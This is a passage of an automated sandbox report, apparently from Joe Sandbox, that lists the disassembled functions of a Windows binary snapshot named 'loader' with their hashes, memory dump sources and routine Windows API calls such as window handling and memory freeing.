              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
              • Instruction ID: 0de420954ead653c52dd9aac3976b1fb7743494f0b37903b8e06618505381604
              • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
              • Instruction Fuzzy Hash: A1C1733A2051B30ADF2E8639A57403FBAA15AA57B131A076DD4F3CB1C6FF10D574DA20
              Function 00116646 Relevance: .3, Instructions: 325COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 0e7fde3544ee90830cc2de17e04f84aabc54cb9e63c5cdc69d4ff2ae74506509
              • Instruction ID: d27c4f9b732eefd15db4756898f95c2a27e3f70fd3f477f8cec7a4e4c5db752b
              • Opcode Fuzzy Hash: 0e7fde3544ee90830cc2de17e04f84aabc54cb9e63c5cdc69d4ff2ae74506509
              • Instruction Fuzzy Hash: 2CD1E6B1A083459FDB1CCF28D8807DBBBE0AF55308F04457DE8849B642D735E999CB96
              Function 001202F6 Relevance: .3, Instructions: 323COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
              • Instruction ID: b4d36ec9526f8f1ee505077defd58b3537141cd6b5a506b3e960f670193a2cc1
              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
              • Instruction Fuzzy Hash: 27C185362051B30ADF6E8639A53403FBAA25AA57B131A076DD4F3CB1D6FF20D574DA20
              Function 0010E2A0 Relevance: .3, Instructions: 318COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c70e42c177abf79357a6336eb4bf9aeed7a60eab7a29eb5b2df6c74899ed09ea
              • Instruction ID: 4675805b0b767b89cc13f90971e961e5a4227e99acdebc047554d47fde9e5406
              • Opcode Fuzzy Hash: c70e42c177abf79357a6336eb4bf9aeed7a60eab7a29eb5b2df6c74899ed09ea
              • Instruction Fuzzy Hash: 31E148795083848FC304CF69D89096ABBF1BF9A304F85095EF5D587362C335EA49DBA2
              Function 00113A3C Relevance: .3, Instructions: 263COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
              • Instruction ID: 6ec1bb7943641b1c69f9ebaf4838f0dfe6516f309db3af9b7d764260c3c273f2
              • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
              • Instruction Fuzzy Hash: EC9148702087458BDB2CEB68D890BFA73D5AF90300F50493EE5E7872C6EB759685C392
              Function 00113D6D Relevance: .2, Instructions: 232COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
              • Instruction ID: d9b276825a8052b2aca988b7fea2f5a5162279e74fe5a43f8dc8750956f59aa2
              • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
              • Instruction Fuzzy Hash: AF7118706043464BDB2CDE28C8D0BF977E5ABA4304F40493DF9E68B2CADB749AC58752
              Function 0012473A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
              • Instruction ID: 89b1acb07d253362483217145931f5d69e6c999e920658786bb658ceb9800a15
              • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
              • Instruction Fuzzy Hash: 8B517C70610AB45BEF3C8AA8B895BBF77C99B63304F180509E993DB282D325DD71D352
              Function 0010DE6C Relevance: .2, Instructions: 190COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 09921c772cf6cf7c94ba359879510a2053ce7e91e108e08e20b75103812b2ca4
              • Instruction ID: 856d99647d96b2ef5dae35ade15a074f5a229a2e2fecf47a27eea82c347397f9
              • Opcode Fuzzy Hash: 09921c772cf6cf7c94ba359879510a2053ce7e91e108e08e20b75103812b2ca4
              • Instruction Fuzzy Hash: 1F81AF9521D2D49EC71A8FBD38A02F93FE25733304B1945AAC4C68AAB7C27645DCD722
              Function 0010E8A0 Relevance: .2, Instructions: 154COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c34d26baa786253af0de23089c946a1b84efa0a604abbf7cc8c31757a2f08021
              • Instruction ID: cbdd084ceb7a840bfefc1bc6336d793bfc6b8f4f434189f16723f40886b7042d
              • Opcode Fuzzy Hash: c34d26baa786253af0de23089c946a1b84efa0a604abbf7cc8c31757a2f08021
              • Instruction Fuzzy Hash: 8B51D0316083D18FC712CF2A918056EBFE1BEDA318F594C9EE4E55B292D370D649CB92
              Function 0010F968 Relevance: .1, Instructions: 131COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6a892768f8445d85643684bee3fb20b7f9583f9ab504d9f6e85e3ddde3d8d84c
              • Instruction ID: 90b811a9c828a94cbecab17065b1fd1d2a6a7913ab9ff5c6cca5060c28525c42
              • Opcode Fuzzy Hash: 6a892768f8445d85643684bee3fb20b7f9583f9ab504d9f6e85e3ddde3d8d84c
              • Instruction Fuzzy Hash: F4512571A083128FC748CF19D49055AF7E1FF88354F058A2EE899A7740DB34E959CB9A
              Function 001137C1 Relevance: .1, Instructions: 112COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
              • Instruction ID: 1b07a21371d75b7fce4bf8040c746a26c8ad38368aa4f797ac7c378cdc0fd62b
              • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
              • Instruction Fuzzy Hash: 8331E5B16047458FCB18DF28C8512AABBE0FB95310F50892DE4E5C7382C775EA89CB92
              Function 00105F3C Relevance: .1, Instructions: 76COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 88937bfc2d81152222d58c5d0147a21227d3602be9b384b3b066f85dc25a28af
              • Instruction ID: 785ee36d5a50dbaa32d40a32128a5ff44a7dd4829d8a393241034a280b5c350d
              • Opcode Fuzzy Hash: 88937bfc2d81152222d58c5d0147a21227d3602be9b384b3b066f85dc25a28af
              • Instruction Fuzzy Hash: 3B210D31A241254BCB48CF2DDC904377755A74A311746813FFA82CB6E0C634ED65CBA0
              Function 0010DA98 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236COMMON
              Download Yara Rule
              APIs
              • _swprintf.LIBCMT ref: 0010DABE
                • Part of subcall function 0010400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0010401D
                • Part of subcall function 00111596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00140EE8,00000200,0010D202,00000000,?,00000050,00140EE8), ref: 001115B3
              • _strlen.LIBCMT ref: 0010DADF
              • SetDlgItemTextW.USER32(?,0013E154,?), ref: 0010DB3F
              • GetWindowRect.USER32(?,?), ref: 0010DB79
              • GetClientRect.USER32(?,?), ref: 0010DB85
              • GetWindowLongW.USER32(?,000000F0), ref: 0010DC25
              • GetWindowRect.USER32(?,?), ref: 0010DC52
              • SetWindowTextW.USER32(?,?), ref: 0010DC95
              • GetSystemMetrics.USER32(00000008), ref: 0010DC9D
              • GetWindow.USER32(?,00000005), ref: 0010DCA8
              • GetWindowRect.USER32(00000000,?), ref: 0010DCD5
              • GetWindow.USER32(00000000,00000002), ref: 0010DD47
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
              • String ID: $%s:$CAPTION$d
              • API String ID: 2407758923-2512411981
              • Opcode ID: f54d72a3ac1bb18991ed1dda418c018ffd9346b7e3d92061c551ade2532a0955
              • Instruction ID: 14720fff7e0a548d1846eac74c7b744efa2a821b3d449366df224f72d2ece93e
              • Opcode Fuzzy Hash: f54d72a3ac1bb18991ed1dda418c018ffd9346b7e3d92061c551ade2532a0955
              • Instruction Fuzzy Hash: 33819071108301AFD710DFA8DD89E6BBBE9EB89704F05091DFA84A3290D7B0E949CB52
              Function 0012C233 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • ___free_lconv_mon.LIBCMT ref: 0012C277
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BE2F
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BE41
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BE53
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BE65
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BE77
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BE89
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BE9B
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BEAD
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BEBF
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BED1
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BEE3
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BEF5
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BF07
              • _free.LIBCMT ref: 0012C26C
                • Part of subcall function 001284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?), ref: 001284F4
                • Part of subcall function 001284DE: GetLastError.KERNEL32(?,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?,?), ref: 00128506
              • _free.LIBCMT ref: 0012C28E
              • _free.LIBCMT ref: 0012C2A3
              • _free.LIBCMT ref: 0012C2AE
              • _free.LIBCMT ref: 0012C2D0
              • _free.LIBCMT ref: 0012C2E3
              • _free.LIBCMT ref: 0012C2F1
              • _free.LIBCMT ref: 0012C2FC
              • _free.LIBCMT ref: 0012C334
              • _free.LIBCMT ref: 0012C33B
              • _free.LIBCMT ref: 0012C358
              • _free.LIBCMT ref: 0012C370
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
              • String ID:
              • API String ID: 161543041-0
              • Opcode ID: 702ecabd9752639ebc7ff2e2fb59eaa3578eb3138ed98e260a797e2018c3c26f
              • Instruction ID: b4519013a9eef5fc09bee50b806655015a6f6529c5c43ae4bdcd0ba87284500e
              • Opcode Fuzzy Hash: 702ecabd9752639ebc7ff2e2fb59eaa3578eb3138ed98e260a797e2018c3c26f
              • Instruction Fuzzy Hash: 23317C32600265DFEB20AE78F945B5AB3E9FF10310F148869E549DB591DF31AC60CBA0
              Function 0011CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
              Download Yara Rule
              APIs
              • GetWindow.USER32(?,00000005), ref: 0011CD51
              • GetClassNameW.USER32(00000000,?,00000800), ref: 0011CD7D
                • Part of subcall function 001117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0010BB05,00000000,.exe,?,?,00000800,?,?,001185DF,?), ref: 001117C2
              • GetWindowLongW.USER32(00000000,000000F0), ref: 0011CD99
              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0011CDB0
              • GetObjectW.GDI32(00000000,00000018,?), ref: 0011CDC4
              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0011CDED
              • DeleteObject.GDI32(00000000), ref: 0011CDF4
              • GetWindow.USER32(00000000,00000002), ref: 0011CDFD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
              • String ID: STATIC
              • API String ID: 3820355801-1882779555
              • Opcode ID: a27cca0ee452e002eab6b1a68d1b7b9ff7dbbbae976fd4e0b2f5e9a84cf5b35a
              • Instruction ID: 4802c672af68c9b930c330b7552df03fd24d7bdc03a3f42c8d54732690f3d3ec
              • Opcode Fuzzy Hash: a27cca0ee452e002eab6b1a68d1b7b9ff7dbbbae976fd4e0b2f5e9a84cf5b35a
              • Instruction Fuzzy Hash: 22110A725857117BE6316BA0AC0AFDF7A5CFF55741F004430FA52A10D2CBB489C686E5
              Function 00128EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 00128EC5
                • Part of subcall function 001284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?), ref: 001284F4
                • Part of subcall function 001284DE: GetLastError.KERNEL32(?,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?,?), ref: 00128506
              • _free.LIBCMT ref: 00128ED1
              • _free.LIBCMT ref: 00128EDC
              • _free.LIBCMT ref: 00128EE7
              • _free.LIBCMT ref: 00128EF2
              • _free.LIBCMT ref: 00128EFD
              • _free.LIBCMT ref: 00128F08
              • _free.LIBCMT ref: 00128F13
              • _free.LIBCMT ref: 00128F1E
              • _free.LIBCMT ref: 00128F2C
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: a7ef4d549f664f50a599873e5ce53cfe567ab060d04b4105f69229784007fc16
              • Instruction ID: 7b3451e5f42b2fa8d1699ba3ff2dd03c375a21e1554fb00dc7d35c0e213b6c91
              • Opcode Fuzzy Hash: a7ef4d549f664f50a599873e5ce53cfe567ab060d04b4105f69229784007fc16
              • Instruction Fuzzy Hash: 7211D27610215DAFCB11FF94E842DDA3BA5FF14350B0180E0BA088B622DB31EA619B80
              Function 00102162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
